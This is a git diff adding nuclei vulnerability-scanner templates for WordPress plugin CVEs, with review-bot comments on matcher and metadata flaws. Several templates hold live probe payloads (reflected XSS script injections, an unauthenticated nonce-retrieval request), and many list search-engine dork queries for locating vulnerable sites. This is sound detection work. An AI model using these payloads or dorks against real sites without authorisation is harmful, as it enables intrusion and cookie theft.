b/poc/cve/CVE-2014-4539-2356.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2014-4539 + +info: + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4539 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2021-24278-5668.yaml b/poc/cve/CVE-2021-24278-5668.yaml new file mode 100644 index 0000000000..72d1bc60ec --- /dev/null +++ b/poc/cve/CVE-2021-24278-5668.yaml 
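Review bot: `reference: |` makes the two `- https://…` lines a single literal block string rather than a YAML sequence, so any consumer expecting a list of references receives one string that starts with a dash; write it as `reference:` followed by `  - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304` and `  - https://nvd.nist.gov/vuln/detail/CVE-2014-4539`. The body word matcher `"'>"` is a very weak signal on its own — practically every HTML page contains a quote followed by a closing bracket — and with only the `text/html` and `200` matchers alongside it the template will fire on most unaffected sites; it looks as though a longer marker (the reflected script element from the request path) was lost in rendering, so the match should be restored to the reflected payload string. The file also has no `tags` key and uses the legacy `requests:` key, unlike the newer templates in this commit, which use `http:`.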
@@ -0,0 +1,46 @@ +id: CVE-2021-24278 + +info: + name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation + author: 2rs3c + severity: high + description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278 + - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413 + - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/ + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-24278 + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + Content-Type: application/x-www-form-urlencoded + + body: "action=wpcf7r_get_nonce¶m=wp_rest" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - '"success":true' + - '"nonce":"[a-f0-9]+"' + condition: and + + extractors: + - type: regex + part: body + regex: + - '"nonce":"[a-f0-9]+"' \ No newline at end of file diff --git a/poc/cve/CVE-2021-24389-5729.yaml b/poc/cve/CVE-2021-24389-5729.yaml new file mode 100644 index 0000000000..024f7e7b87 --- /dev/null +++ b/poc/cve/CVE-2021-24389-5729.yaml 
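Review bot: The POST body on the `body:` line reads `action=wpcf7r_get_nonce¶m=wp_rest`; a `¶` is what `&para` becomes when `&param` is HTML-entity-decoded, so if the committed file really contains the pilcrow character the `param` field is never sent and the `"nonce":"…"` regex matcher cannot fire. The line should read `body: "action=wpcf7r_get_nonce&param=wp_rest"`; confirm against the raw file, since this may be a rendering artifact of the page rather than the file content. The template also has no `tags` key and uses the legacy `requests:` key, unlike the newer templates in this commit.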
@@ -0,0 +1,35 @@ +id: CVE-2021-24389 + +info: + name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 + tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24389 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-25120(1).yaml b/poc/cve/CVE-2021-25120(1).yaml new file mode 100644 index 0000000000..88e63fa569 --- /dev/null +++ b/poc/cve/CVE-2021-25120(1).yaml 
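Review bot: The first matcher's `words:` list holds only the empty string `""`, which every response body satisfies, so together with the `text/html` and `200` matchers the template flags any HTML page and the reflection of the `foodbakery_radius` value is never actually checked; it looks as though the script element originally in that word was stripped during rendering. Match on the decoded form of what the path sends instead, e.g. `- "</script><script>alert(document.domain)</script>"`. The `CVE-2022-0201(1).yaml` hunk below has the same problem: its first `words` entry is `''`, and with `condition: and` next to `pm_query` the empty entry contributes nothing to the match.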
@@ -0,0 +1,60 @@ +id: CVE-2021-25120 + +info: + name: Easy Social Feed < 6.2.7 - Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. + remediation: | + Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 + - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25120 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25120 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* + metadata: + max-request: 2 + vendor: easysocialfeed + product: easy_social_feed + framework: wordpress + tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'type' : ''" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 
4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0201(1).yaml b/poc/cve/CVE-2022-0201(1).yaml new file mode 100644 index 0000000000..bd225046da --- /dev/null +++ b/poc/cve/CVE-2022-0201(1).yaml 
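Review bot: The new file is named `CVE-2021-25120(1).yaml`, the pattern a browser or file manager produces for a second download of the same file, and its `id: CVE-2021-25120` collides with the `CVE-2021-25120.yaml`, `-5806` and hash-suffixed copies already in the index, so nuclei will deduplicate them by id; if this copy is meant to stay, rename it and give it a distinct id (the other hunks in this commit use a hash suffix for that). The trailing `# digest:` line is the signature from the upstream templates repository and only verifies against byte-identical content, so any change to the copy — including the body word `"'type' : ''"`, which looks truncated — means the signature no longer validates. The `CVE-2022-0201(1).yaml` hunk below has the same `(1)` name, colliding id and digest line.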
@@ -0,0 +1,51 @@ +id: CVE-2022-0201 + +info: + name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 + - https://plugins.trac.wordpress.org/changeset/2656512 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0201 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40882 + cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: permalink_manager_lite_project + product: permalink_manager_lite + framework: wordpress + tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project + +http: + - method: GET + path: + - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'pm_query' + condition: and + + - type: word + part: header + words: + - text/html +# digest: 490a00463044022026f5edf6c9325db54e5dba0b0e39a8ad5fead51d43680b3a5a21b56c956d5c9202205b2e57c67c716336383fa1af54b8b29eec6b914edfbae42fbcbcc1f0f6e799aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10453.yaml b/poc/cve/CVE-2024-10453.yaml
new file mode 100644
index 0000000000..79703bcdc2
@@ -0,0 +1,59 @@
+id: CVE-2024-10453-68cf66b7073e2bbdcfb231b1737ffdbf
+
+info:
+ name: >
+ Elementor Website Builder – More than Just a Page Builder <= 3.25.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Typography Settings
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typography Settings in all versions up to, and including, 3.25.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23604b7-5a7f-4be7-bc73-cb4facdd1e73?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10453
+ metadata:
+ fofa-query: "wp-content/plugins/elementor/"
+ google-query: inurl:"/wp-content/plugins/elementor/"
+ shodan-query: 'vuln:CVE-2024-10453'
+ tags: cve,wordpress,wp-plugin,elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.25.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10797.yaml b/poc/cve/CVE-2024-10797.yaml
new file mode 100644
index 0000000000..a4b5f824d0
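Review bot: `severity: low` in the info block disagrees with the `cvss-score: 6.4` and the `S:C/C:L/I:L` vector beside it, which CVSS 3.1 rates as medium, so consumers that filter on severity and those that filter on score will disagree about this finding; the same mismatch is in the hunks for CVE-2024-10797 and CVE-2024-11852 (low over 4.3), CVE-2024-11196, CVE-2024-11763, CVE-2024-11776, CVE-2024-11889 and CVE-2024-11897 (low over 6.4), and inverted in CVE-2024-11722, where `severity: critical` sits over a 5.9 score and an `AC:H` vector. The `id` here carries a hash suffix while the file is `CVE-2024-10453.yaml`, and a hash-named sibling appears to already exist in this directory, so two templates would share one id, which nuclei flags as a duplicate; the same id-versus-filename split recurs in the hunks for CVE-2024-10797, CVE-2024-11196, CVE-2024-11287, CVE-2024-11349, CVE-2024-11682, CVE-2024-11688, CVE-2024-11722, CVE-2024-11808 and CVE-2024-11811. The detection itself is version-only, a `Stable tag` read from readme.txt fed to `compare_versions`, with no request that touches the affected code path, and a readme whose stable tag is not numeric leaves both `version` extractors empty so the dsl matcher fails silently instead of reporting an undetermined version. A header comment such as `# version-only check: infers the affected range from readme.txt, does not exercise the vulnerability` on each of these templates would keep that limitation visible to whoever reads the scan output.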
--- /dev/null
+++ b/poc/cve/CVE-2024-10797.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10797-8735cd5ecd4eb322a4cce0b2bcfa0daf
+
+info:
+ name: >
+ Full Screen Menu for Elementor <= 1.0.7 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10797
+ metadata:
+ fofa-query: "wp-content/plugins/full-screen-menu-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/full-screen-menu-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-10797'
+ tags: cve,wordpress,wp-plugin,full-screen-menu-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/full-screen-menu-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "full-screen-menu-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11196.yaml b/poc/cve/CVE-2024-11196.yaml
new file mode 100644
index 0000000000..e9a4afcf48
--- /dev/null
+++ b/poc/cve/CVE-2024-11196.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11196-f6d286fa677ac17e271cb0be03129144
+
+info:
+ name: >
+ Multi-column Tag Map <= 17.0.33 - Authenticated (Contributor+) Stored Cross-Site Scripting via mctagmap Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mctagmap shortcode in all versions up to, and including, 17.0.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb41862a-0cde-46f0-bd86-5a04e76f7345?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11196
+ metadata:
+ fofa-query: "wp-content/plugins/multi-column-tag-map/"
+ google-query: inurl:"/wp-content/plugins/multi-column-tag-map/"
+ shodan-query: 'vuln:CVE-2024-11196'
+ tags: cve,wordpress,wp-plugin,multi-column-tag-map,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/multi-column-tag-map/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multi-column-tag-map"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 17.0.33')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml b/poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml
new file mode 100644
index 0000000000..7bbd676400
--- /dev/null
+++ b/poc/cve/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636
+
+info:
+ name: >
+ Schema App Structured Data <= 2.2.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/48db673c-f978-45f4-9d7b-eddd81cee62e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11279
+ metadata:
+ fofa-query: "wp-content/plugins/schema-app-structured-data-for-schemaorg/"
+ google-query: inurl:"/wp-content/plugins/schema-app-structured-data-for-schemaorg/"
+ shodan-query: 'vuln:CVE-2024-11279'
+ tags: cve,wordpress,wp-plugin,schema-app-structured-data-for-schemaorg,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/schema-app-structured-data-for-schemaorg/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "schema-app-structured-data-for-schemaorg"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11287.yaml b/poc/cve/CVE-2024-11287.yaml
new file mode 100644
index 0000000000..e421b07e51
--- /dev/null
+++ b/poc/cve/CVE-2024-11287.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11287-33536fea15ec5164056e1863a099338b
+
+info:
+ name: >
+ Ebook Store <= 5.8001 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8001. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/001289a3-a1a9-441f-b399-e9b699094e1a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11287
+ metadata:
+ fofa-query: "wp-content/plugins/ebook-store/"
+ google-query: inurl:"/wp-content/plugins/ebook-store/"
+ shodan-query: 'vuln:CVE-2024-11287'
+ tags: cve,wordpress,wp-plugin,ebook-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ebook-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ebook-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.8001')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11349.yaml b/poc/cve/CVE-2024-11349.yaml
new file mode 100644
index 0000000000..8cdc746e50
--- /dev/null
+++ b/poc/cve/CVE-2024-11349.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11349-492c070998afb1c1259a8c8e6c2a2e7c
+
+info:
+ name: >
+ AdForest <= 5.1.6 - Authentication Bypass
+ author: topscoder
+ severity: critical
+ description: >
+ The AdForest theme for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.1.6. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the sb_login_user_with_otp_fun() function. This makes it possible for unauthenticated attackers to log in as arbitrary users, including administrators.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f374b3d1-820b-473f-8d2b-c3267e6d23d9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-11349
+ metadata:
+ fofa-query: "wp-content/themes/adforest/"
+ google-query: inurl:"/wp-content/themes/adforest/"
+ shodan-query: 'vuln:CVE-2024-11349'
+ tags: cve,wordpress,wp-theme,adforest,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/adforest/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "adforest"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11682.yaml b/poc/cve/CVE-2024-11682.yaml
new file mode 100644
index 0000000000..6c39cb2e61
--- /dev/null
+++ b/poc/cve/CVE-2024-11682.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11682-f008a2d5e25cf2cd1eef864640aea744
+
+info:
+ name: >
+ G Web Pro Store Locator <= 2.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The G Web Pro Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11682
+ metadata:
+ fofa-query: "wp-content/plugins/gwebpro-store-locator/"
+ google-query: inurl:"/wp-content/plugins/gwebpro-store-locator/"
+ shodan-query: 'vuln:CVE-2024-11682'
+ tags: cve,wordpress,wp-plugin,gwebpro-store-locator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gwebpro-store-locator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gwebpro-store-locator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11688.yaml b/poc/cve/CVE-2024-11688.yaml
new file mode 100644
index 0000000000..ac6669f112
--- /dev/null
+++ b/poc/cve/CVE-2024-11688.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11688-14d2a5f31dc0e4861931d1fc0c65a354
+
+info:
+ name: >
+ LaTeX2HTML <= 2.5.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The LaTeX2HTML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ver' or 'date' parameter in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b3d9af8b-1168-462d-a767-d16ee660f646?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11688
+ metadata:
+ fofa-query: "wp-content/plugins/latex2html/"
+ google-query: inurl:"/wp-content/plugins/latex2html/"
+ shodan-query: 'vuln:CVE-2024-11688'
+ tags: cve,wordpress,wp-plugin,latex2html,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/latex2html/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "latex2html"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11722.yaml b/poc/cve/CVE-2024-11722.yaml
new file mode 100644
index 0000000000..ebef5fa607
--- /dev/null
+++ b/poc/cve/CVE-2024-11722.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11722-13dedbf7f4be1ec6f6f6ff2a845970ec
+
+info:
+ name: >
+ Frontend Admin by DynamiApps <= 3.25.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.25.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This requires an unauthenticated user to have been given permission to view form submissions, and the form submission shortcode be added to a page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/97cef309-da2f-461a-b5a3-3a85c540c7aa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.9
+ cve-id: CVE-2024-11722
+ metadata:
+ fofa-query: "wp-content/plugins/acf-frontend-form-element/"
+ google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/"
+ shodan-query: 'vuln:CVE-2024-11722'
+ tags: cve,wordpress,wp-plugin,acf-frontend-form-element,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "acf-frontend-form-element"
+ part: body
+
